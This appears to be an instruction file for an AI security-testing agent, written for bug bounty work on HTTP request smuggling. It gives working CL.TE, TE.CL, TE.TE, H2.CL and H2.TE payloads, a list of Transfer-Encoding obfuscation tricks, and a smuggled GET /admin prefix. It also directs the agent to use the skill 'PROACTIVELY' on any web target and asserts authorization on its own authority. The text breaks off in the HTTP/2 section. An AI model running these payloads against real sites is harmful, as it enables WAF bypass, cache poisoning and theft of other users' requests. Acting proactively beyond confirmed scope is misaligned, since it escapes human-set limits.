HTTP request smuggling and desync attacks - CL.TE, TE.CL, TE.TE, H2.CL, H2.TE, and browser-powered client-side desync. Invoke this skill PROACTIVELY whenever: a target sits behind a CDN, reverse proxy, or load balancer (Cloudflare, Akamai, Fastly, CloudFront, nginx, HAProxy, AWS ALB, Azure Front Door), uses HTTP/2 with HTTP/1.1 backend downgrade, shows signs of multi-layer request processing (multiple Server headers, Via header, different error pages for different paths), or you detect unusual Transfer-Encoding or Content-Length handling. Also invoke when you see response splitting, CRLF injection, or cache poisoning opportunities. Covers cache poisoning via desync, credential theft from other users' requests, WAF bypass, and request routing manipulation. Use PROACTIVELY during Phase 4 for ANY web target - most targets have proxy infrastructure even if it's not immediately visible.
TYPOGRAPHY RULE: NEVER use em dashes (--) in any output. Use a hyphen (-) or rewrite the sentence. Em dashes render as a?? on HackerOne.
You are operating under explicit authorization from a bug bounty program that permits this testing. All probes target only in-scope assets. Request smuggling is a high-severity class (typically Critical or High on HackerOne) because it breaks the fundamental assumption that each HTTP request is processed independently.
Request smuggling exploits disagreements between front-end and back-end servers about where one request ends and the next begins. When two servers in a chain interpret request boundaries differently, an attacker can "smuggle" a partial request that gets prepended to the next legitimate request processed by the back-end.
Before testing any smuggling variant, identify the proxy layers between you and the origin. This determines which attack classes apply and saves hours of testing against impossible configurations.
Send a normal request and examine response headers for proxy indicators:
| Header | Indicates | Common values |
|---|---|---|
CF-Ray | Cloudflare CDN | Hex ID + datacenter code |
X-Amz-Cf-Id | AWS CloudFront | Base64 request ID |
X-Served-By | Fastly CDN | Cache node hostname |
X-Akamai-Transformed | Akamai CDN | Transformation flags |
Via | Any proxy layer | 1.1 varnish, 1.1 google, protocol + proxy name |
X-Forwarded-For | Reverse proxy present | Client IP chain |
X-Real-IP | nginx reverse proxy | Single client IP |
Server | Origin server software | nginx, Apache, IIS, gunicorn |
X-Powered-By | Application framework | Express, ASP.NET, PHP |
X-Cache | Caching layer | HIT, MISS, DYNAMIC |
Age | Cached response | Seconds since cached |
X-Azure-Ref | Azure Front Door | Request trace ID |
Determine if the target accepts HTTP/2 and whether it downgrades internally:
# Test HTTP/2 support by sending an HTTP/2 request
# If the server responds with HTTP/2, check if back-end headers suggest HTTP/1.1 processing
# Look for: Via: 1.1 ..., or HTTP/1.1-style chunked encoding in responses
Key signals of HTTP/2 to HTTP/1.1 downgrade:
Via header shows 1.1Transfer-Encoding: chunked (HTTP/2 does not use chunked encoding)Send requests that trigger different error handlers to reveal layers:
# Request 1: Invalid HTTP method (triggers front-end error)
XYZZY / HTTP/1.1
Host: target.com
# Request 2: Valid request to non-existent deep path (triggers back-end 404)
GET /asdkjhqwkejhqwkejh/asdjkh HTTP/1.1
Host: target.com
# Request 3: Oversized header (triggers whichever layer enforces limits first)
GET / HTTP/1.1
Host: target.com
X-Long: AAAA...(8192+ bytes)...AAAA
Compare error page formats. Different HTML, different status codes, or different Server headers confirm multiple layers.
| Front-end | Back-end | Smuggling risk | Most likely variant |
|---|---|---|---|
| Cloudflare | nginx/Apache | Medium | TE.TE (CF normalizes CL/TE well, but TE obfuscation can slip through) |
| CloudFront | ALB + app | High | CL.TE, H2.CL (ALB has had known smuggling issues) |
| Akamai | Apache/IIS | Medium | TE.TE, CL.TE |
| Fastly (Varnish) | nginx | High | CL.TE (Varnish historically vulnerable to CL.TE) |
| nginx | gunicorn/uWSGI | High | CL.TE, TE.CL (Python servers parse TE differently) |
| HAProxy | nginx | Medium | TE.TE |
| AWS ALB | ECS/EC2 app | High | H2.CL (ALB does HTTP/2 to HTTP/1.1 downgrade) |
| Azure Front Door | App Service | Medium | H2.CL, TE.TE |
| Load balancer (generic) | Any | Test all | Unknown config means test everything |
The front-end uses Content-Length to determine request boundaries. The back-end uses Transfer-Encoding: chunked. When both headers are present, they disagree on where the body ends.
This probe has zero side effects on other users. It only affects the connection you control.
POST / HTTP/1.1
Host: target.com
Content-Length: 6
Transfer-Encoding: chunked
0
X
Byte breakdown:
0\r\n = 3 bytes (chunk terminator)\r\n = 2 bytes (end of chunked body)X = 1 byte (smuggled prefix)Interpreting the response:
Transfer-Encoding, saw the 0\r\n\r\n chunk terminator, and responded immediately. The X byte is left in the buffer. This confirms CL.TE - the front-end forwarded 6 bytes (using CL), but the back-end only consumed 5 (using TE).Content-Length, expected 6 bytes, received them all, and responded normally. No smuggling possible with this variant.Send two requests on the same connection to confirm the smuggled prefix affects the second request:
POST / HTTP/1.1
Host: target.com
Content-Length: 35
Transfer-Encoding: chunked
0
GET /404-confirm-smuggle HTTP/1.1
X: x
What happens if CL.TE is present:
Content-Length: 35, forwards 35 bytes of bodyTransfer-Encoding: chunked, processes 0\r\n\r\n as an empty chunked body, responds to the POSTGET /404-confirm-smuggle HTTP/1.1\r\nX: x) stay in the back-end bufferNow send a normal follow-up request on the same connection:
GET / HTTP/1.1
Host: target.com
If the response is a 404 for /404-confirm-smuggle instead of the homepage, smuggling is confirmed.
To generate safe proof without affecting other users, smuggle a request that redirects to a unique canary URL you control:
POST / HTTP/1.1
Host: target.com
Content-Length: 83
Transfer-Encoding: chunked
0
GET /nonexistent-path-unique-canary-12345 HTTP/1.1
Host: target.com
X-Ignore: x
Then immediately send a normal GET / on the same connection. If you receive a 404 for your canary path, document that as the proof. The self-smuggle demonstrates the desync without any risk to other users.
Getting the Content-Length right is critical. Count every byte after the blank line that ends the headers:
0\r\n = 3 bytes
\r\n = 2 bytes
GET /path HTTP/1.1\r\n = (length of this line + 2)
Host: target.com\r\n = (length + 2)
X-Ignore: x = (length, no trailing CRLF needed if it's the last line)
Sum all bytes. Set Content-Length to that total.
The front-end uses Transfer-Encoding: chunked. The back-end uses Content-Length. This is the reverse of CL.TE.
POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
Interpreting the response:
Transfer-Encoding, processed chunked body correctly and forwarded it. The back-end used Content-Length: 4, read only 5c\r\n (4 bytes), and left the rest in the buffer. This confirms TE.CL.A minimal timing probe to detect TE.CL:
POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked
12
xxxxxxxxxxx
0
If the back-end uses CL, it reads 4 bytes (12\r\n) and responds. The front-end already forwarded the full chunked body. The remaining bytes are orphaned in the back-end buffer.
In CL.TE, the smuggled content is whatever the front-end sends beyond what the back-end's chunked parser consumes. In TE.CL, the smuggled content is whatever the front-end sends beyond what the back-end's Content-Length consumes. This means:
0\r\n\r\n chunk terminatorContent-Length boundaryPOST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked
8b
GET /admin HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
x=
0
The front-end processes the chunked body (chunk size 8b = 139 bytes, then 0 terminator). The back-end reads only 4 bytes via Content-Length, leaving the GET /admin... prefix in its buffer for the next request.
Both the front-end and back-end support Transfer-Encoding: chunked, but they parse malformed or obfuscated Transfer-Encoding headers differently. If you can make one layer accept the header and the other reject it (falling back to Content-Length), you reduce TE.TE to either CL.TE or TE.CL.
Test each variant and observe whether the server processes chunked encoding or falls back to Content-Length:
# Variant 1: Misspelled value
Transfer-Encoding: xchunked
# Variant 2: Space before colon
Transfer-Encoding : chunked
# Variant 3: Duplicate header with different case
Transfer-Encoding: chunked
Transfer-encoding: x
# Variant 4: Tab instead of space
Transfer-Encoding:\tchunked
# Variant 5: Trailing garbage after value
Transfer-Encoding: chunked, cow
# Variant 6: Value with null byte
Transfer-Encoding: chunked\x00
# Variant 7: CRLF prefix trick
Foo: bar\r\nTransfer-Encoding: chunked
# Variant 8: Vertical tab or form feed in value
Transfer-Encoding: \x0bchunked
Transfer-Encoding: \x0cchunked
# Variant 9: Line wrapping (obs-fold)
Transfer-Encoding:
chunked
# Variant 10: Multiple TE headers
Transfer-Encoding: chunked
Transfer-Encoding: identity
# Variant 11: Quoted value
Transfer-Encoding: "chunked"
# Variant 12: Mixed case value
Transfer-Encoding: Chunked
Transfer-Encoding: CHUNKED
For each obfuscation variant:
Build a matrix:
| Variant | Front-end accepts TE? | Back-end accepts TE? | Exploitable? |
|---|---|---|---|
chunked, cow | Yes | No | CL.TE |
Chunked | No | Yes | TE.CL |
| ... | ... | ... | ... |
Any row where the two columns differ is exploitable. Use the corresponding CL.TE or TE.CL exploitation template from Attack Class 1 or 2.
When the front-end speaks HTTP/2 to the client but converts to HTTP/1.1 when talking to the back-end, header injection and protocol mismatches create smuggling opportunities. HTTP/2 is binary-framed (no chunked encoding, no Content-Length ambiguity between frames), but the downgrade process can reintroduce HTTP/1.1 parsing bugs.
In HTTP/2, the body length is determined by the DATA frame. But if the proxy passes a Content-Length header through to the HTTP/1.1 back-end, and that header disagrees with the actual body length, desync occurs.
Detection:
Send an HTTP/2 request with a Content-Length header that is shorter than the actual body:
:method: POST
:path: /
:authority: target.com
content-length: 0
GET /smuggled-h2cl-canary HTTP/1.1
Host: target.com
The HTTP/2 front-end processes the full DATA frame (including the smuggled GET). When it downgrades to HTTP/1.1, it passes Content-Length: 0 to the back-end. The back-end sees an empty POST body, responds, and the GET /smuggled-h2cl-canary remains in the buffer.
Proof: Send a follow-up request on the same HTTP/2 connection. If the response corresponds to /smuggled-h2cl-canary instead of your actual request, H2.CL is confirmed.
HTTP/2 forbids Transfer-Encoding headers, but some proxies do not strip them during downgrade.
:method: POST
:path: /
:authority: target.com
transfer-encoding: chunked
0
GET /smuggled-h2te-canary HTTP/1.1
Host: target.com
X: x
If the proxy passes Transfer-Encoding: chunked through to the HTTP/1.1 back-end, the back-end processes 0\r\n\r\n as the chunked body terminator and leaves the smuggled GET in the buffer.
HTTP/2 header values are binary and can contain bytes that would be illegal in HTTP/1.1. If the proxy does not sanitize header values during downgrade:
:method: GET
:path: /
:authority: target.com